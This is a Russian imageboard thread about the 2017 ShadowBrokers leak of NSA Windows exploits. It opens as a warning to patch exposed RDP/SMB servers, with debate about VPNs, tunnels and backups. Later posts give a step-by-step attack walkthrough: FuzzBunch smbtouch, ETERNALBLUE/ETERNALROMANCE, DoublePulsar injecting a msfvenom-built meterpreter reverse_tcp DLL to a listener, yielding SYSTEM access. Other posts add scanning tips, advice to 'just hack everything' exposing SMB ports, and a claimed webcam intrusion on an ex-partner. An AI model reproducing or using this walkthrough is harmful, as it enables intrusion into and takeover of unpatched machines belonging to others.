14 апреля группа ShadowBroker высыпала в общий доступ кучку эксплойтов для разного.
Не прошло и трех дней, как НАЧАЛОСЬ.
В зоне риска все виндоадмины и просто любители держать дедик с виртуалкой и доступом по рдп.
Если у тебя винда торчит открытым rdp в интернет, особенно если у тебя winserver 2008 - ты попал, так что скорее беги ставить патчи от Microsoft или закрывать порт.
У меня лично только что так заовнили пустую виртуалку, с которой я иногда ходил в обход блокировок. Так-то пофиг, все равно была дотационная, лол. Но знаю, что многие не озадачиваются своевременной защитой. Обратите внимание, возможно ваш сервер или виртуалку уже шифруют.
Но тред-то не об этом. Эти эксплойты пошли в жизнь, они действительно рабочие и доставляют массу неприятностей.
У кого открыты порты rdp и smb в интернет, внутри локальной сети - позаботьтесь о патчах. Ибо любой дятел с нулевыми правами может хакнуть ваш сервак (и уже есть шифраторы, которые это используют).
Собственно тема только стартовала, через пару-тройку дней будет вой в интернетах "ой, меня похакали, что делать".
>>151192610 Там и так все давно в курсе наверняка.
Я постил именно для того, чтобы обратить внимание энкеев и недоадминов. Да вообще всех. Впереди явно будет эпидемия лютых шифровальщиков, которые в случае забивания на обновления и прочее могут легко а) повышать приоритет до админа и шифровать все, до чего дотянутся. б) искать машины с открытыми smb и rdp портами в локальной сети (а таких мелкофирм, где три компа и сервак - тысячи) и получать с помощью этого админский доступ, шифруя все на них.
Так что это варнинг всем, будьте аккуратнее и делайте бекапы и ставьте патчи.
>>151194337 Обычным лучше тоже побеспокоиться. Если даже работаешь из-под ограниченнгого пользователя, то на непатченной машине эксплойт может выполнить код с полными правами. Тоже обновляйся.
Кроме того, я уже писал выше, есть старый и эффективный способ фишинга, тоже внезапно слишком много стало встречаться. Например вот сайт - https://www.аррӏе.com/ - выглядит нормально? (если макаба не сломает ссылку)
>>151184817 (OP) На моем ноуте и так уже было установлено куча репаков разных игр с торрентов, где аноны в комментах кидали логи касперского что там какой-то файл заражен и мне было похуй, ибо лень был оперекачивать. Отключен мелкомягкий фаервол и прочее, потому что не нужною А ты тут о некроОС. Хотя, XP я бы поставил.
>>151196143 >Если я сижу за НАТом, мне же похуй - так? Как сказать. Если высунул rdp, чтобы ходить на домашнюю тачку с работы или из отпуска - ты попал.
Если нет, то вариант второй - ссылка типа той, что выше, ведущая якобы на обычный сайт. Даже внимательный анон может кликнуть по такой, не все же пиксельхантингом заниматься. А дальше - либо эксплойты в adobe flash, дыры постоянно находятся свежие и все с remote execution, либо еще что-то похожее.
Например письмо от банка, от МТС/билайна с якобы детализацией, что-то ОБЫЧНОЕ. Чуть невнимательно глянул, типа как с той ссылкой на эппл.ком - и все, чпок, здравствуйте.
>>151197067 >>151197519 Да, punycode, если не присматриваться, то не заметишь сразу. А много ли анонов-параноиков, которые пыцрятся в ссылку, прежде чем перейти по ней, особенно когда она выглядит знакомо?
Спасибо. Вещь действительно опасная и в первую очередь для обычноанонов, которые начитались в интернете про rdp и прочее, а про безопасность не подумали. И админы поневоле (он же юрист, "но ты же шаришь в компьютерах") тоже попадают в зону риска.
Я почему тред стартанул - у меня на одном из серваков висела виртуалка с виндой, так, для обхода всяких блокировок торрентов и прочего. Ничего важного, просто чистая винда, обновки стояли вручную по март. Особо секьюрностью не заморачивался, но наружу торчал лишь рдп порт на нестандартном 43210 вместо 3389. Поставил всего месяц назад. Судя по остаткам логов - один из тех самых эксплойтов, шифровано все, что можно - запустился из-под админа. Так-то похрен, новую виртуалку из бекапа раскатаю, но подумалось об анонах, у которых есть какие-то важные данные на таких серваках, а на безопасность они подзабили.
>>151198747 ПИДОР БЛЯТЬ! ВЫ ПОСМОТРИТЕ, СУКА, НА НЕГО, НЕ ВЫ ПОСМОТРИТЕ СУКА НА НЕГО. ОН БЭКАПИТЬ ПОШЁЛ! ЛЮДИ СИДЯТ НА ПИВЕ И ХЛЕБЕ, А У КАКОГО-ТО УБЛЮДКА 5 HDD ЗА 12К КАЖДЫЙ ПО 3 ТЕРАБАЙТА АГА, НУ ТЫ МРАЗЬ ССУУУКА, МАЖОР БЛЯТЬ
>>151193536 >и впихнуть туда кросскомпилированный линуксовый сервер и клиент. >ECHOWRECKER remote Samba 3.0.x Linux exploit. Из той же пачки.
>>151196601 >А ты тут о некроОС. ETERNALROMANCE is a SMB1 exploit over TCP port 445 which targets XP, 2003, Vista, 7, Windows 8, 2008, 2008 R2, and gives SYSTEM privileges (MS17-010) ETERNALSYNERGY is a SMBv3 remote code execution flaw for Windows 8 and Server 2012 SP0 (MS17-010) ETERNALBLUE is a SMBv2 exploit for Windows 7 SP1 (MS17-010)
>>151196020 >О, значит биток полезет вверх. Надо закупиться Ты прав, скоро спрос возрастет.
>>151200260 >ЛЮДИ СИДЯТ НА ПИВЕ И ХЛЕБЕ, А У КАКОГО-ТО УБЛЮДКА 5 HDD ЗА 12К КАЖДЫЙ ПО 3 ТЕРАБАЙТА АГА, НУ ТЫ МРАЗЬ ССУУУКА, МАЖОР БЛЯТЬ Уважаемый, для вас тоже есть решение - обновленный пак иконок на сервер (по аналогии с торпедой автомобиля), окропить сервер святой водой, помолиться, чтобы минула чаша сия.
>>151201783 Радость от того что имеешь дома часть интернетов, которые к тому времени уже выпилят. HDD, не SSD, у меня жесткий диск лет 9 работает и до сих пор норм.
>>151211566 Да, если открыт порт rdp (или smb), если операционка windows 7 или винсервер 2003-2008-2012 и если не стоит последний патч от майкрософт - получаем логин с правами SYSTEM
В данное время все, кто сидел с открытым rdp и непатченной виндой на хецнере и ovh тихо охреневают. Я и сам охренел, когда мою виртуалку грохнули именно таким образом.
У кого серваки/компы смотрят открытым портом rdp в инет - БЕГОМБЫСТРОБЛЕА патчиться.
Меня не спасло даже переназначение 3389 порта на левый типа 43210. Виртуалке месяц исполнился, в марте развернул, пропатчил на тот момент до упора и ОТКЛЮЧИЛ обновления, чтобы не мешали, все равно был временный вариант. Мне-то норм, а вот тех, у кого похожая ситуация хочу предупредить.
>>151213788 >Но так-то уже мало кто использует RDP, да ещё и с выходом в сеть. Ога. То-то всякая удаленная бухгалтерия и дырки на серваки мелких организаций. Я ради лулзов просканировал диапазон своего провайдера - их там море.
И далее, это работает и внутри локальной сети, изнутри. Если открыты сетевые шары - здраститя, заходите. Добро пожаловать в 2007й кажется, или когда там дыры в rpc winxp sp2 были размером с ворота?
>>151214004 >Ога. То-то всякая удаленная бухгалтерия и дырки на серваки мелких организаций. Ну хрен знает, много где админил и как правило никто не использует RDP. Радмин, тимвивер, ещё какая-то залупа - вот это пожалуйста. А вообще изучал rdp-протокол и охуел от его толстоты.
Эти эксплойты - часть спизженного у NSA инструментария. Так-то фришный кусок архива выкладывали что-то около года назад, там все срали кирпичами с дырок в цисках и прочих суровых сетевых железяках. А эта часть была под паролем, а пароль продавали за грязные даллары. То ли купил кто, то ли еще - я в подробности не вдавался, но главное пароль три дня назад всплыл в общем доступе. Тот годовалый архив-шкатулка Пандоры таки им раскодируется. И за три дня умельцы уже привинтили эксплойт к шифратору и прошлись маршем смерти по hetzner, ovh и прочим конторам, где многие любили хостить такие вот винбоксы.
Блять на человеческом языке обьясните че дают эти порты то бля?? я могу подключиться к чужому компу? или на сервак например чужой? например сервак игры у кого стоит я могу ломануть базу данных?
>>151214036 >Моей предыдущей конторе пизда. А то, лично знаю таких умельцев. Их на самом деле дофига таких непуганных.
Так что всем, кто в курсе, про что тред - обновляйтесь, закрывайте порты, делайте вход через vpn и ssh туннели - никаких откртытых наружу нативных майкрософт портов.
>>151214449 >завтра опять бежать в М.Видео на работу. У многих таких работников из аналогов мвидео местного разлива явно будет выходной. сервак-то не работает, все.
>>151214653 Они уже есть - выше в треде,ссыль на сайте майкрософта. Те, кто отключил у себя обновки, опасаясь внезапного пришествия дриснятки - выбирайте, какой вам стул удобнее - с пиками в виде эксплойтов или с удобными мягкими и длинными анальными зондами десятой версии от Майкрософт, лол.
Сколько помню Microsoft, регулярно раз в несколько лет просираются таким образом. Причем каждый раз дыры глобальные и дают полный доступ. Они там их по ходу специально встраивают для всяких спецслужб.
>>151215383 И по факту это все компьютеры, имеющие на борту шиндовс и смотрящие в интернеты напрямую. Кстати, не только шиндовс, там и соляра, и саноси.
>>151214996 А то. 2011, 2013 - дыры примерно такого же калибра. Дыры в ИЕ, которые тоже обеспечивали remote code execution и кто бы мог подумать - никогда такого не было - и вот опять, снова.
>>151215095 > Администрирование сервера по рдп. А там и не надо администрировать. Достаточно просто высунуть порт. Даже если в системе разрешено через рдп поработать только юзеру с насмерть урезанными правами. Это примерно как дыра 11 года, когда можно было кучей пакетов UDP на закрытый порт проломиться до уровня system. Винда такая винда.
Самое интересное, я так сейчас порыл в сети - куча "советов" как сделать удаленный доступ к себе домой, типа раньше-то рдп был ненадежный, а теперь - огого, можно так в инет выставлять, максимум - порт переназначить.
Интересно, сколько людей последовало таким советам?
>>151215332 Ну например аналогия. У тебя в квартире бронированная дверь, на подъезде домофон. Любой вася может открыть твою супербронированную дверь удаленно, потыкав в кнопки. Фирма-установщик выпустила исправление, забытый винтик, который нужно вкрутить в замок. Но кто знает об этом, кто не знает, кому дойти лень до установщика.
>>151215438 Да, там и солярки много, и остальной экзотики. Даже голосовой шлюз от Avaya замногобаксов тоже того...
>>151215689 >Откуда ты знаешь? ничего подозрительного не заметил
>>151215731 >Два варианта, либо ты умеешь их готовить, либо до них еще очередь не дошла. >У тебя рдп наружу торчит? Патчи стоят? Да. win 2008r2, раз в несколько месяцев накатывал патчи.
>>151215865 >Да. win 2008r2, раз в несколько месяцев накатывал патчи.
Ну так-то у меня на той несчастной виртуалке тоже 2008р2 стояла, последние патчи тоже в начале марта накатывал. Исправление было 17 марта.
Так что я бы тебе посоветовал СРОЧНО обновляться, вешать рдп порт за туннель ssh хотя бы. Где хостишься? Основная атака вчера и сегодня была на ovh, hetzner, redstation - в основном буржуйские хостинги. Так что я бы тебе советовал не терять времени, а то может уже процесс идет. Я для этого тред и начал, чтобы предупредить таких анонов.
>>151216246 >Так-то спасибо. Странно что на других порталах этой новости не видел. Через пару дней увидишь, гарантирую. Это прямо вот сейчас происходит. Посмотри на http://www.webhostingtalk.com/showthread.php?t=1643701 - первые очнувшиеся начинают появляться.
Там сплошь решето, кроме rdp и smb там еще замечательные дыры в обработчике PDF, в adobe flash, как обычно, в графических библиотеках. И все такое няшное, все с remote code execution
>Обновляюсь, но вешать ничего не буду, ибо это костыли. Ну мое дело сообщить, что с этой информацией кто будет делать - его проблемы. Я бы вообще не стал ни одного нативного порта высовывать наружу. Туннель не проблема, vpn не проблема, ясно, что не так удобно, но увы, не то время, чтобы радоваться удобствам.
>>151216301 >По rdp уязвимы все версии винды, или только win2003, для которой в репе эксплоит? Вроде как все (от xp до 8.1 и соответственно 2008r2 точно). Насчет десятки не уверен, но знакомые говорят, что подтверждается на 2012 сервере, так что я бы не рисковал.
>>151184817 (OP) >дедик с виртуалкой и доступом по рдп. >доступом по рдп. Как вы этой дрянью вообще пользоваться можете? Однажды пришлось ходить через виндовый сервер с rdp - как говна пожрал.
SSH: $ ssh -t nigger@gate ssh faggot@target
Винда: Открываешь RDP клиент. Отдельным окном, ясен хуй. Какой tmux, какой screen? Ждем пока все откроется На столе находим 'Shortcut to YOBASHELL.EXE' (хули не putty, но ладно) Ждем This software trial period has expired. Ждем еще Ищем так кнопку, потом еще одну, слышим крик из соседнего загона что ему тоже на этот сервер надо, а заходить можно по одному (там наверно типа секурно так настроено было, я не верю что ОС в 2017 году может быть таким тупым говном). Ищем дальше. 5 окон, 5 тулбаров, вкладочки, закладочки (ибо шелла с Ctrl-R не завезли), какая-то еще поебень. Наконец открывается терминал целевой машины. Который занимает 60% от всего RDP окна. Clipboard'ы, естественно, не работают Ебануть порты? Редиректнуть ввод/вывод с локалхоста? SCP? Agent? Хуй знает где. Через пять минут приходится освобождать этот нужник, ведь другим тоже в ту сеть надо. Зато ТАЙЛЫ и ПЕЙНТ есть. Обои еще поменять можно.
>>151217013 Лол дебил. Одним кликом ты подключаешься к впн, вторым стартуешь рдп всё. Лишний клик ему лень сделать, зато будем сервак голой жопой выставлять в глобал, какой пиздец.
>>151216597 >>151216613 >Вроде как все (от xp до 8.1 и соответственно 2008r2 точно). Ммм. Понятненько. Зойпилите в тред ман для спермы, чтобы rdp слушал только впн интерфейс.
>>151217282 Ну значит нахуй идет впн-сервер. Рдп очень просто на домашней тачке включается (или на рабочем месте том же), и везде можно сразу подключатся без проблем со скоростью.
>>151217328 >Рдп очень просто на домашней тачке включается (или на рабочем месте том же), и везде можно сразу подключатся без проблем со скоростью. Ну, может кому-то нравится выставлять голую жопу в окно, за которой летают стаи хуёв, и надеяться, что ни один из них не воткнётся.
>>151217340 >Речь изначально за ssh тунель шла. С впн чуть проще, но это добавляет костылей. Да там настройка вся в два клика, что за костыли? Лишний раз перед коннектом на иконке щелкнуть? С ssh сервером я по привычке. Чего сложного - на винде поднял, ключи создал, по клиентам раскидал. Коннект - прокидываешь изнутри свой любимый порт 3389 на любой локальный, к нему же и коннектишься по rdp Два клика.
VPN тоже не ядерная физика, есть же готовые решения, один раз прочитал - пользуйся. Если у тебя сотрудники по удаленке к серверу коннектятся - то только так.
Я-то себе виртуалку с прямым рдп портом делал чтобы с телефона зайти можно было без проблем на нее зайти, так-то удобно. На рабочем серваке так делать нельзя никак.
>>151217705 Эталонный жопочтец. Конкретно ты никому не нужен. Но боты не разбирают, кто нужен, а кто нет. Они хуярят по площадям. И ты в такую площадь попадешь.
>>151217634 >Да там настройка вся в два клика, что за костыли? В 2 клика? Там пердолиться надо неслабо.
>Чего сложного - на винде поднял, ключи создал, по клиентам раскидал Ебать, еще с ключами я дела не имел. Во времена двухфакторной аутентификации для людей я буду еще ключи таскать.
>Я-то себе виртуалку с прямым рдп портом делал чтобы с телефона зайти Так и у меня сервак для личного пользования и работы и что бы удобно было откуда угодно зайти. Естественно никаких критичных данных не хранится, поэтому и не пердолюсь. Если бы хранились то конечно бы сделал подключение через vpn.
>>151217810 Нет, боты сделают так, что тебе больше не на что будет жопу щекотать. Утром проснешься и увидишь, что все твои animal-gay-porn.jpg уже не .jpg.
>>151218028 Ну если уж так хочется двухфакторку, то хуле б нет. Вообще двухфакторка это и есть костыль для долбоебов, не могущих в ключи и сертификаты, проще смску вбить.
>>151218110 >Это только то, что утекло. А сколько того, что не утекло? С таким подходом тебе нужно отключить всё электричество в квартире и надеть шапочку из фольги, вдруг пришельцы по торсионным полям твои мысли читают.
>>151218190 Эникеи, ламеры - да как не назови. Речь не о том, проблема-то реально серьезная, а люди пока еше не вдуплили в ее возможные последствия.
Можешь обклеить все стены сертификами и гордиться, этот тред не для тебя. Я его создавал, чтобы как можно больше народа, использующего такие схемы подключения оглянулись и почуяли огромный член, крадущийся к их жопе.
>>151218370 На роутере? Снаружи, из интернета - да.
Но тут момент - если у тебя в локалке домашней расшарены папки, то может прилететь с соседнего компа. Если включен upnp - тоже есть шанс, что какой-нибудь крек от васяна откроет. Так то по сути вернулись во времена RPC DCOM эксплойтов, когда эникеи носились от компа к компу в локалке мелких контор. Сейчас грядет повторение.
>>151218423 Некоторые делают для удобства себе дырку на рабочий сервак. Сотрудникам поработать удаленно, самому залезть и поправить что-то из дома. Таких наивных много. А на серваке бухгалтерия, всякая такая параша - пиздык, и админко вешается на куске патчкорда. Большие объемы данных затрахаешься бекапить, к тому же, в мелкоконторах на ручках экономят, не то, что на NAS для бекапов.
>>151218629 Откуда в мелкоконторе большие объемы, там покупается юсб хард на терабайт и туда все бэкапится. Хард лежит в сейфе и выдается админу для бэкапа раз в неделю.
>>151218629 Скрипт пишется, который дампает БД регулярно, и кладет на ФТП или NAS, как нехуй делать. Если не осилили, то сами виноваты, это даже студент осилит.
>>151218859 Кек, так обычно и бывает. У нас в конторе какой-то древний комп под бэкапы юзали, который хз кто из дому притащил. Жесткие диски просто в него тыкали.
>>151218913 Такие конторы просто обязаны однажды попасть под вирусняк/эксплоит, который к хуям уебет данные. Только так начальники поймут, что бабло надо тратить не только на свои мерседесы.
Snowden:"This is not a drill: #NSA exploits affecting many fully-patched Windows systems have been released to the wild. NSA did not warn Microsoft.
>>151218713 >Ну если автобэкап не настроили, то нахуй таких админов. Василь семеныч, нам нас нужен для бекапов. Каждый день бухгалтерию и все эти писульки, что менеджеры настрочили. Нужно 20к на диски. Как нахуй? Что, изыскать свободные средства? Окай.джпг
>Откуда в мелкоконторе большие объемы База 1с десяток гигов, доки всякие инкрементально, пару ответственных машинок с ключами/криптопро/випнетами/говном_всяким - целиком образами, ибо затрахаешься если что восстанавливать. Так-то немало для регулярных бекапов. >Хард лежит в сейфе и выдается админу для бэкапа раз в неделю. И именно в тот момент, вечером, пока на него сливается все, наработанное за неделю в порт кто-то негромко стучится...
>Скрипт пишется, который дампает БД регулярно, и кладет на ФТП или NAS, как нехуй делать. Который собран из говна десятилетней выдержки?
Суть-то в том, что так или иначе у админов (эникеев, побегаек, как ни назови) все равно резко прибавится работы и проблем.
>>151218758 В моей прошлой конторе я делал бэкапы трижды. Один раз на NAS в соседнем офисе, зареганном на другую контору, второй раз просто на юсб хард постоянно подключенный к серверу, и третий раз на юсб хард, который начальник хранил в банковской ячейке (sic!)
>>151219001 >так или иначе у админов (эникеев, побегаек, как ни назови) все равно резко прибавится работы и проблем У нормальных админов винды обновляются и не торчат голым RDP в интернет.
>>151219164 Еще раз, тред адресован всем, и нормальным, и ненормальным, и не админам совсем, кто открыл у себя порт рдп по гайду, чтобы из любого места на домашний комп заходить. Кто-то прочитает и скажет - ну, я так никогда не делаю. Ок, молодец. А кто-то уже сейчас рвет на жопке волосы и пытается вспомнить, когда он в последний раз делал бекап.
>>151219209 >На личном mail.ru cloud же ставишь, и все туда бэкапится. В том числе и свежезашифрованны файлы. Облако-то синхронизируется с твоей базовой папкой, что там лежит, то и в облаке будет.
К тому же майлру - ну как-то я даже не знаю, или ты заранее все к досмотру предъявляешь?
>>151220750 Внешний же. Если ты за роутером не в режиме DMZ - то опасаться нужно только внутренних угроз+уязвимостей роутера(не врубать работу его вёб-морды в WAN как минимум)
проиграл в голос с опа долбаеба который даже не удосужился описание почитать рдп эксплоит работает только для икспи и 2003 это старое говно и так ебут все кому не лень.
>>151220842 Иди нахуй шиндоусебан. ПОРА ПЕРЕУСТАНАВЛИВАТЬ ШИНДОУС, ТАААК ЧТО ТУТ У НАС ОБНОВЫ НАКАТИТЬ АХАХХАХ НАКАНЕЦТА. Уже 4 года не ставил не одной обновы на свою 7.
>>151220877 и много ты самбы жопой в инет видел лалка? Большая часть спрятана за натом и порт специально пробрасывать никто не будет Те немногие с дайрект айпи скорее всего заблокируются фаерволом. Алсо уже все топ антивирусы детектят это говно. В общем оп треда обычный студент который вдруг ощутил ПРИЧАСТНОСТЬ к хакирам. Сажа скрыл.
>>151220847 тоже поржал с долбаебов. 300 постов дауны трут о том как страшно жить при этом никто даже описание не прочитал. Походу оп начинающий провинциальный админ судя по стилю постов.
>>151220931 А зачем тебе жопой в инет? Тебе хватит троянчика, запущенного секретаршей в твоей конторе. PEEZDARIQUE всему.
>Алсо уже все топ антивирусы детектят это говно. Ты не понимаешь момента - конкретные тулзы - да, детектятся, но важен-то способ. Через неделю появятся новые, еше не детектящиеся. Кроме того, это захватит огромный парк машин, на которых стоит по каким-то причинам необновляемая система. А таких во внутренних сетях предприятий достаточно.
>>151221131 Кончай нести ахинею. Секретарша и так запустит любое говно. И так полно сплоитов типа потато которые отлично работают на необновленных системах. В чем суть твоего мессаджа не ясно. Но видно что тебе очень хочется казаться умным. Продолжай расказывать как 2008 сервер овнит сплоит для 2003. Сажа.
Еще раз. В сети уже полно случаев, когда ломали сервера с единственным открытым рдп портом. Единственная моя цель - предупредить анона, который еще не в курсе ситуации.
>Продолжай расказывать как 2008 сервер овнит сплоит для 2003. Да мне похрен на тебя. Считаешь себя самым умным - ок, я не против.
>>151221274 Да. Работает. Развернул из бекапа свою ту виртуалку и грохнул ее уже сам. 2008r2, обновления ставил месяц назад, до глобальных патчей. Больше времени разбираться не было.
Мне без разницы, веришь ты или нет, мое дело предупредить тех, кому это может навредить.
>>151221368 Спасибо анон, ты очень добрый хакер, боженька тебя за это вознаградит, на небе А на самом деле ненужно кричать о таких вещах, я щитаю. Нужно дать рибитишкам вдоволь порезвится
>>151220931 >и много ты самбы жопой в инет видел лалка? У меня в мухосранске один единственный(номинально есть ещё 1, но на нём 0.01% сидят) провайдер. Он ВСЕМ клиентам предоставляет белый, хоть и динамический(после реконнекта PPPoE) IP. Да, дома у многих стоят wi-fi роутеры, но не у всех же. Просканил сейчас 255 адресов провайдера - 4 самба порта торчит наружу. А сколько всего у провайдера клиентов, как думаешь? Кто теперь лалка? >>151220888 >Иди нахуй шиндоусебан Нет ты. >Уже 4 года не ставил не одной обновы на свою 7. Ну ты и балбес.
>>151221519 Кстати да, не стоит списывать со счетов уязвимости в древних тплинках+дефолтные или очень простые пароли+возможно включенный wps. Всякие хакиры довольно быстро напишут бота, который всё это автоматом будет чекать и попадая в роутер пробрасывать самба порт наружу.
>>151221913 Если хакнут - всё, что угодно. Хоть файлы удалять, хоть вёбкамерой подсматривать как ты письку трёшь. Но более вероятный вариант, что весь твой винт зашифруют и предложат заплатить денег за расшифровку.
ДЛЯ ТЕХ КТО НЕ ПОНЯЛ - ПРОСТО ОБНОВИТЕ СВОЙ ШИНДОУС И НЕ ПАРЬТЕСЬ
БЛЯЯЯЯ, ну сука. Придётся заняться теперь диким пердолингом. У меня к серваку был рдп настроен свой порт. В роутере был дмз настроен. Ну бля теперь всё перенастраивать придётся. Или может забью ибо всё равно хотел железо менять
>>151223867 >>151224042 Часть 2. Создаешь в корне диска C: папку logs. Открываешь консоль, переходишь в папку с fb.py (c:\nsa\), запускаешь: python fb.py и смотришь, какую ошибку напишет (а напишет он, что не найдена папка бла-бла-бла). Из текста ошибки дёргаешь название папки, создаёшь её в c:\nsa\. Всё, you are ready to rock.
>>151224289 Часть 3, самое интересное. Создаешь новый проджект в fuzzbunch. Забиваешь IP'шники (первый - жертва, второй - твой), Use redirection - n (или no, хуй проссышь как оно вообще работает). Запускаешь smbtouch (use smbtouch), оно будет спрашивать всякое, просто соглашайся (в тепличных условиях нормально работает, на "живых" машинах могут возникнуть небольшие затруднения). Ждёшь пока отработает и смотришь, каким сплоитом можно пробить тачку (для 7 32/64 и 2k8 обычно eternalblue).
>>151224496 Часть 3, продолжение. Если советует юзать eternalblue - юзай его, если советует eternalromance или eternalchampion - юзай eternalromance (проще в настройке). Прописываешь use eternalblue, опять начнутся вопросы, обрати внимание на тип payload'а (FB/DANE) - нам нужен FB, сервис (SMB, 445) и архитектуру атакуемой системы (smbtouch вроде пишет при сканировании). Заполняешь, спросит про плагины - y, ждёшь. Если будет написано =======WIN=======, то значит на атакуемой машине заработал doublepulsar (NSA'шный бэкдор).
>>151224644 В обоих виртуалках в настройках адаптера выстави тип подключения - "Внутренняя сеть" и какое-нибудь одинаковое имя. После установки систем назначь IP'шники машинам (10.0.0.1/255.255.255.0 на первой и 10.0.0.2/шлюз 10.0.0.1/255.255.255.0 на второй)
>>151224621 Часть 4. Так, теперь самое главное. Нужна тачка с metasploit framework. Версия не суть важна, но лучше, конечно, что-нибудь относительно свежее. Для начала соберём DLL, которую будем скармливать DoublePulsar'у. Если атакуемая тачка на x32(x86), то пишем: msfvenom -p windows/meterpreter/reverse_tcp LHOST="IP хоста с metasploit (без кавычек)" LPORT=1338 -f dll > meter32.dll. В рабочей директории появится meter32.dll, перекидываем её в C:\nsa на атакующем хосте. Поднимаем хэндлер, для этого: 1) Запускаем сам MSF - msfconsole 2) После запуска - use multi/handler 3) set payload windows/meterpreter/reverse_tcp 4) set lhost 0.0.0.0 5) set lport 1338 6) exploit -j После этого хэндлер запустится в фоновом режиме (посмотреть, работает ли он, можно с помощью команды jobs в консоли metasploit)
>>151224935 Часть 5, почти финал. В консоли fuzzbunch пишем use doublepulsar, снова начнутся вопросы. Архитектура - такая же, как и на атакуемой машине, дальше спросит про Function - выбираем номер с RunDLL. Спросит про путь до DLL - вводим путь до собранной DLL с meterpreter'ом (c:\nsa\meter32.dll). Прожимаем энтер на всё остальное и ждём. Если всё нормально, то в консоли metasploit появится инфа по отправке стэйджа meterpreter, после чего откроется новая сессия. >>151224992 Под винду спёртого вроде нет, проще кали накатить.
>>151225119 Часть 6. NoFun Прибиваем doublepulsar (use doublepulsar, дальше всё как в 5 части за исключением функции - выбираем Uninstall) и радуемся meterpreter'у с правами NT Authority\SYSTEM. Что делать дальше - уже на своё усмотрение.
>>151224935 Спасибо тебе аноньчик, все развернуто и понятно. Я так понял отработает doublepulsar и зальет нашу dll'ку затем откроется сессия в метерпретер, собственно обязательно дллку или можно exe заливать?
>>151225100 bgp.he.net >>151225217 DLL онли, Raw Shellcode роняет систему. Если сессия не появится, а doublepulsar будет писать, что бэкдор отработал - попробуй заново запустить doublepulsar (смотри ч.5)
>>151225300 Ясненько, слава богу что ты есть, на днях еще такой в твитере сижу репостчю этого хакерфантастик, думаю будет настроение над попробовать, а тут и ты подоспел с гайдом. Сам вряд-ли бы разобрался, вначале думал там в самом fb.py сессия открывается
>>151225447 Если SMB/NBT не заблочены, то нет >>151225458 А сессия и в fb.py открывается (можешь глянуть - пропиши session после того как eternalblue отработает)
>>151224935 Алсо, быстрофикс вот сюда. Если же атакуемая ось x64, то после windows добавляется /x64/ (и в msfvenom, и в multi/handler). Т.е. должно получиться так: windows/x64/meterpreter/reverse_tcp
>>151225592 Кстати можно до сих пор находить такие, встречаются под MS08-067 их мало, но есть.
Еще небольшая заметочка может кому тоже пригодится: masscan в 139, 445 не умеет, не знаю почему но конкретно их точно не ищет, их можно искать тупо сканируя 3389, т.к на дедиках они как правило в пачке присутствуют, а затем уже по этому списку пройтись nmap'ом если нужен именно 445.
Взломал комп бывшей. Теперь смогу наконец смотреть её вебкамеру lkdsgnafaba'vbak'ergjaer[gwjeriglkfdvnkjlds vsdf.sd sg, sg sgbsrgtrtbrtbrtbrtrtttttttttttttttttttttttttttttttttttttt
>>151225675 Так можно и своими силами сканить. Обновившихся, на вскидку, процентов 15-20. Можно просто ломать всё (почти всё), что торчит наружу 137/139/445 портом.
Да кто блядь включает этот сраный рдп, да еще и порты пробрасывает через роутеры наружу? есть такие ебонутые? слышал только, что дебики так 1С юзают, ну что взять с говноедов.
>>151225915 >слышал только, что дебики так 1С юзают, ну что взять с говноедов Щито поделать, когда другие дебики не выделяют денег на сервер виртуализации\1с сурв, а сами гоняют на майбахах
>>151226054 Как работает? Ставится в фоне, инсталится при выключении, ещё и спрашивает как хочешь поставить и хочешь ли ты ставить обновления качая с мобильного инета. Если ты не деб который на Семёрке в 2к17 году конечно же.
>>151184817 (OP) Помню какой-то хацкер пробрался в мой ровутер через DynDNS, переименовал точку доступа в PWNEDBy2ch и пароль в SmeniParol. Это я потом понял что у меня DynDNS и пароль стандартный был, но когда я обнаружил ВТОРЖЕНИЕ я знатно очканул.
>>151226570 Подозреваю, что ты про голую win7 SP1? Давно уже есть решение(пишу для x64): 1)Голая семерка, вырубаешь СРАЗУ проверку обновлений до втыкания кабеля. 2)Вставляешь кабель, качаешь KB3172605-x64 и KB3020369-x64. Ставишь. 3)Качаешь kb3125574 (это по сути SP2 для семерки), ставишь. 4)Врубаешь обновления и докачиваешь без гемора последние апдейты. Ссылка по теме: https://habrahabr.ru/company/eset/blog/301080/
>>151227335 Это один раз сделать и потом спокойно можно оставишь автоматические апдейты. Я столько раз семерку ставил и прекрасно знаю, что если просто win7 сп1 попросить обновиться вин-апдейтом - 2 часа поиска обновлений, 2 часа установки, все апдейты с первого раза скорее всего не встанут -> после ребута снова 2 часа поиска и еще час установка. Так что это "дрочево" самый лучший вариант накатывания семерки.
>>151227605 Сижу за роутером, не обновляю (стоит восьмерка). Мне пизда? под обновление я ведь правильно понял обновление до более новой винды? (Да, я тупой)
>>151184817 (OP) > или закрывать порт > или закрывать порт. Тред не читал. Ебанаты, не умеющие менять номера дефолтных портов, а также ограничивать доступ на маршрутизаторе извне, должны страдать.
>>151227791 > челиков с включенным рдп еще нужно попробовать найти. Блядь, как ты себе представляешь сервер с данными, имеющим на сетевой карте реальный белый ip? Я такого даже в цирке не видел.
>>151227714 > Сижу за роутером, не обновляю (стоит восьмерка). Мне пизда? Роутер не панацея - в них тоже есть уязвимости и места для атак. Но в целом это конечно уменьшает шансы вляпаться. > под обновление я ведь правильно понял обновление до более новой винды? (Да, я тупой) Нет, обновления безопасности для твоей версии. По умолчанию в винде включены автоматические обновления. Смотри у себя в системе "обновления windows"
>>151227904 Я не >>151227791, но всё же. Представь, на одной из машин в сети появляется малварь (спам, флэха с автораном, еще какая-нибудь дрисня, придумай сам). Подгружается этот же msf, делается pivoting, через поднятый туннель ломается этот злосчастный сервак.
Как снять форму высоковольтного (20-30 кВ) низкочастотного (~50 Гц) сигнала, не используя делитель или трансформатор на входе осциллографа? Есть какие-нибудь бесконтактные датчики на такие напряжения?
>>151227993 > Представь, на одной из машин в сети появляется малварь Представил. Тогда вся эта хакерская хуита из ОП-поста уже не нужна. Сам же знаешь ,что 95% взломов -кроты или тупость пользователей.
>>151228081 А вот и нет, как раз таки для этого она и нужна (говорю тебе как жуньёр-пенетрастьё). Первичка с минимальными правами > администратор домена за пару кликов.
Такс, пойду я спать, ночь слишком затянулась. Вечером буду тут: NULLчан.hk/i/5324 (там ноль, да), можете задать свои ответы по поводу fuzzbunch, обновлений, msf и прочего около-каккерского. >>151223809-кун
Не знаю, на какую доску вбросить, кину тут.
14 апреля группа ShadowBroker высыпала в общий доступ кучку эксплойтов для разного.
Не прошло и трех дней, как НАЧАЛОСЬ.
В зоне риска все виндоадмины и просто любители держать дедик с виртуалкой и доступом по рдп.
